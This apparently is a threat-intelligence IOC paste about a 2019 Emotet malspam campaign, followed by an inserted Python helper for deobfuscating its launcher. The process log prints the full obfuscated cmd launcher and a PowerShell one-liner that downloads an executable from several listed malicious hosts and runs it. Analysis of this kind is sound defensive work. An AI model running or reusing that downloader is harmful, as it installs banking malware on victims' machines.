#emotet_230119

VRad Jan 25th, 2019 (edited)
#IOC #OptiData #VR #emotet #feodo #banker #xml #powershell

https://pastebin.com/D9TDts5J

previous contact:
20/12/18        https://pastebin.com/EejcbL4t
04/12/18        https://pastebin.com/znQDtbnt
09/11/18        https://pastebin.com/THHMs2wg
01/10/18        https://pastebin.com/Y6DnbpHv

FAQ:
https://twitter.com/dvk01uk/status/1087660817452011520
https://pastebin.com/g8gMJKui
https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
https://kc.mcafee.com/corporate/index?page=content&id=KB90108

attack_vector
--------------
email attach .doc (XML) > macro > cmd > powershell_v5(!) > GET 5 URL > %temp%\***.exe

email_headers
--------------
Received: from ded1262.inmotionhosting.com (ded1262.inmotionhosting.com [173.247.255.190])
    by srv8.victim1.com (8.15.2/8.15.2) for <user0@org7.victim1.com>;
    Thu, 24 Jan 2019 07:33:34 +0200 (EET)
    (envelope-from jonathan.contreras@grupodecme.com.mx)
Received: from [104.152.233.226] (port=53273 helo=10.15.58.80)
    by ded1262.inmotionhosting.com with esmtpsa
    (envelope-from <jonathan.contreras@grupodecme.com.mx>)
    for user0@org7.victim1.com;
    Wed, 23 Jan 2019 07:49:42 -0800
Date: Wed, 23 Jan 2019 07:49:38 -0800
From: С ув.Андрей Сикорский 066-105-91-55,093-992-66-84 b2motor.com <jonathan.contreras@grupodecme.com.mx>
To: user0@org7.victim1.com
Subject: Aw: Outstanding INVOICE XPAHS/2921629/1194

files
--------------
SHA-256 339c428878402bf90c1ff0653d51626cfa6adff27a13adf75a42ed26d138b59f
File name   FILE-T00978774.doc
File size   258.31 KB

SHA-256 1e95b89a23fc36786d336b4bfd4c0a6fb84630bb62e34270da6b604fd9bf7d8a
File name   aBQ0J3QEI0nmVgZS0xq.exe [from galvanengenharia.com 1st]
File size   229.5 KB

SHA-256 f8e3c1cf0eafcbd54f0e26dbb7ca108a0a3f3a97546504af8a9e03ee75949189
File name   XisJxx7N143.exe         [from imarketsforextrading.com]
File size   238.5 KB

SHA-256 829c9c9d7d1f238e97bd3307392dad0f1537906505b694f1199ec9ddbee3bd52
File name   f76rt7cruttl6.exe       [from galvanengenharia.com 2nd]
File size   242 KB

activity
**************

powershell
powershtll

deobfuscated_macro
--------------
command: powershell $ntij='vcshw';$fkkv=new-object Net.WebClient;$jrpoz='imarketsforextrading{.} com/vpFtztlmbWLmXZWL@gencbafralilar{.} com/wp-admin/css/MSTealncf2Y_JI@north-bear{.} ru/SLiZjYZC4ZYAVon@galvanengenharia{.} com/NLuJg0pMQ6qrvYd4G_c0@nancybrouwer{.} nl/D8LOhbAH25ha'.Split('@');$qsqp='iowi';$bddaq = '168';$cuvfr='vwlui';$jbbj=$env:temp+'\'+$bddaq+'.exe';foreach($douz in $jrpoz){try{$fkkv.DownloadFile($douz, $jbbj);$ijqu='acino';If ((Get-Item $jbbj).length -ge 40000) {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';

pl_src:     1/5
--------------
imarketsforextrading{.} com/vpFtztlmbWLmXZWL/       not_downld
gencbafralilar{.} com/wp-admin/css/MSTealncf2Y_JI   404
north-bear{.} ru/SLiZjYZC4ZYAVon                    503
galvanengenharia{.} com/NLuJg0pMQ6qrvYd4G_c0/       200
nancybrouwer{.} nl/D8LOhbAH25ha                     blocked

C2:
--------------
182.180.170.72:22
189.253.39.50:8080

netwrk
--------------
104.225.130.135 www.imarketsforextrading.com    GET /vpFtztlmbWLmXZWL           HTTP/1.1    noUA
5.250.241.110   gencbafralilar.com              GET /wp-admin/css/MSTealncf2Y_JI HTTP/1.1   noUA
92.53.114.3     north-bear.ru                   GET /SLiZjYZC4ZYAVon            HTTP/1.1    noUA
191.6.205.20    galvanengenharia.com            GET /NLuJg0pMQ6qrvYd4G_c0       HTTP/1.1    noUA
189.253.39.50   189.253.39.50:8080              GET /                           HTTP/1.1    Mozilla/4.0

comp
--------------
powershtll.exe  1152    104.225.130.135 80  ESTABLISHED
powershtll.exe  1152    5.250.241.110   80  ESTABLISHED
powershtll.exe  1152    92.53.114.3     80  ESTABLISHED
powershtll.exe  1152    191.6.205.20    80  ESTABLISHED

turnedbased.exe 2488    182.180.170.72  22  SYN_SENT
turnedbased.exe 2488    189.253.39.50   8080    ESTABLISHED

proc
--------------
c:\rjbv\qwqqb\mclaw\..\..\..\windows\system32\cmd.exe  /c CmD /V:/C"set 78QN=Ue%x5FNB4D':drkCP@u{(XinhY$.byo1pq_)Ac6ETS3vH2V0+g,~ZGOQa=J z\l-wjL}/tf;m8MWIs&&for %X in (...)do set p0QM=!p0QM!!78QN:~%X,1!&&if %X gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
CmD  /V:/C"set 78QN=Ue%x5FNB4D':drkCP@u{(XinhY$.byo1pq_)Ac6ETS3vH2V0+g,~ZGOQa=J z\l-wjL}/tf;m8MWIs&&for %X in (...)do set p0QM=!p0QM!!78QN:~%X,1!&&if %X gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
C:\Windows\system32\cmd.exe  /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $ntij='vcshw';$fkkv=new-object Net.WebClient;$jrpoz='http://www.imarketsforextrading.com/vpFtztlmbWLmXZWL@http://gencbafralilar.com/wp-admin/css/MSTealncf2Y_JI@http://north-bear.ru/SLiZjYZC4ZYAVon@http://galvanengenharia.com/NLuJg0pMQ6qrvYd4G_c0@http://nancybrouwer.nl/D8LOhbAH25ha'.Split('@');$qsqp='iowi';$bddaq = '168';$cuvfr='vwlui';$jbbj=$env:temp+'\'+$bddaq+'.exe';foreach($douz in $jrpoz){try{$fkkv.DownloadFile($douz, $jbbj);$ijqu='acino';If ((Get-Item $jbbj).length -ge 40000) {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';"
C:\Windows\system32\cmd.exe  /S /D /c" FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd') DO %e   "
C:\Windows\system32\cmd.exe /c assoc.cmd
cmd
powershtll  $ntij='vcshw';$fkkv=new-object Net.WebClient;$jrpoz='http://www.imarketsforextrading.com/vpFtztlmbWLmXZWL@http://gencbafralilar.com/wp-admin/css/MSTealncf2Y_JI@http://north-bear.ru/SLiZjYZC4ZYAVon@http://galvanengenharia.com/NLuJg0pMQ6qrvYd4G_c0@http://nancybrouwer.nl/D8LOhbAH25ha'.Split('@');$qsqp='iowi';$bddaq = '168';$cuvfr='vwlui';$jbbj=$env:temp+'\'+$bddaq+'.exe';foreach($douz in $jrpoz){try{$fkkv.DownloadFile($douz, $jbbj);$ijqu='acino';If ((Get-Item $jbbj).length -ge 40000) {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';
C:\tmp\168.exe
C:\Users\operator\AppData\Local\turnedbased\turnedbased.exe

(old)
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
c:\rjbv\qwqqb\mclaw\..\..\..\windows\system32\cmd.exe .... gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
CmD  /V:/C"set 78QN=Ue%x5FNB4D':drkCP@u... gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
C:\Windows\system32\cmd.exe  /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll ...
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd') DO %e "
C:\Windows\system32\cmd.exe /c assoc.cmd
C:\Windows\system32\cmd.exe powershell $ntij='vcshw';$fkkv=new-object Net.WebClient;... $jbbj=$env:temp+'\'+$bddaq+'.exe';... {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';
"C:\Users\operator\AppData\Local\Temp\168.exe"
"C:\Users\operator\AppData\Local\Temp\168.exe"
"C:\Users\operator\AppData\Local\wabmetagen\wabmetagen.exe"
"C:\Users\operator\AppData\Local\wabmetagen\wabmetagen.exe"
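As an added example that is not part of this paste, a small Python triage helper for the launcher and downloader recorded above: it emulates the cmd.exe %VAR:~start,len% substring expansion that hides the PowerShell binary name in the proc list, and pulls the URL list and drop filename out of the deobfuscated downloader. The environment values are constructed; with a default profile the token resolves to powershell, while TEMP=C:\tmp (the value the C:\tmp\168.exe drop path above implies) yields powershtll, the process name seen in the activity and comp sections.

```python
import re

# Launcher token and deobfuscated downloader, copied from this paste (URLs kept defanged).
LAUNCHER = "pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll"
DOWNLOADER = ("$ntij='vcshw';$fkkv=new-object Net.WebClient;$jrpoz='imarketsforextrading{.} com/vpFtztlmbWLmXZWL"
              "@gencbafralilar{.} com/wp-admin/css/MSTealncf2Y_JI@north-bear{.} ru/SLiZjYZC4ZYAVon"
              "@galvanengenharia{.} com/NLuJg0pMQ6qrvYd4G_c0@nancybrouwer{.} nl/D8LOhbAH25ha'.Split('@');"
              "$qsqp='iowi';$bddaq = '168';$cuvfr='vwlui';$jbbj=$env:temp+'\\'+$bddaq+'.exe';"
              "foreach($douz in $jrpoz){try{$fkkv.DownloadFile($douz, $jbbj);$ijqu='acino';"
              "If ((Get-Item $jbbj).length -ge 40000) {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';")

_SUBSTR = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*):~(-?\d+)(?:,(-?\d+))?%")

def cmd_substring(value, start, length=None):
    """Emulate cmd.exe %VAR:~start,len%: negative start counts from the end,
    negative len trims from the end, missing len runs to the end."""
    n = len(value)
    s = start if start >= 0 else max(n + start, 0)
    e = n if length is None else (s + length if length >= 0 else max(n + length, 0))
    return value[s:e]

def expand_cmd_substrings(cmd, env):
    """Resolve every %VAR:~a,b% token in cmd against env (cmd names are case-insensitive)."""
    upper = {k.upper(): v for k, v in env.items()}

    def repl(m):
        name, start, length = m.group(1).upper(), int(m.group(2)), m.group(3)
        if name not in upper:
            return m.group(0)  # unknown variable: keep the raw token visible to the analyst
        return cmd_substring(upper[name], start, None if length is None else int(length))
    return _SUBSTR.sub(repl, cmd)

def extract_download_urls(ps):
    """Pull the '@'-joined URL list out of the downloader's .Split('@') call."""
    m = re.search(r"'([^']*)'\.Split\('@'\)", ps)
    return m.group(1).split("@") if m else []

def extract_drop_name(ps):
    """Recover the %TEMP% drop name built from $env:temp, a variable and '.exe'."""
    m = re.search(r"\$env:temp\+'\\'\+\$(\w+)\+'\.exe'", ps, re.IGNORECASE)
    var = m and re.search(r"\$%s\s*=\s*'([^']*)'" % m.group(1), ps)
    return var.group(1) + ".exe" if var else None

if __name__ == "__main__":
    # Constructed environments: a default profile, and TEMP=C:\tmp as the drop path in this paste implies.
    env = {"PUBLIC": r"C:\Users\Public", "SESSIONNAME": "Console", "TEMP": r"C:\Users\operator\AppData\Local\Temp"}
    print(expand_cmd_substrings(LAUNCHER, env))                         # powershell
    print(expand_cmd_substrings(LAUNCHER, {**env, "TEMP": r"C:\tmp"}))  # powershtll
    print(extract_download_urls(DOWNLOADER), extract_drop_name(DOWNLOADER))
```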

persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run              25.01.2019 14:39
turnedbased 3dfxTools Common Library    3dfx Interactive, Inc.
c:\users\operator\appdata\local\turnedbased\turnedbased.exe 25.01.2019 22:40

drop
--------------
C:\tmp\168.exe
C:\Users\operator\AppData\Local\turnedbased\turnedbased.exe

# # #
https://www.virustotal.com/#/file/339c428878402bf90c1ff0653d51626cfa6adff27a13adf75a42ed26d138b59f/details

https://www.virustotal.com/#/file/1e95b89a23fc36786d336b4bfd4c0a6fb84630bb62e34270da6b604fd9bf7d8a/details
https://analyze.intezer.com/#/analyses/af88b324-e56b-4fd1-a8af-25a97d0163f2

https://www.virustotal.com/#/file/f8e3c1cf0eafcbd54f0e26dbb7ca108a0a3f3a97546504af8a9e03ee75949189/details
https://analyze.intezer.com/#/analyses/20ce9259-1f35-41b9-8eb1-7d1408865a77

https://www.virustotal.com/#/file/829c9c9d7d1f238e97bd3307392dad0f1537906505b694f1199ec9ddbee3bd52/details
https://analyze.intezer.com/#/analyses/200c4e09-f2ea-42c2-a803-1f98537d92af

VR

@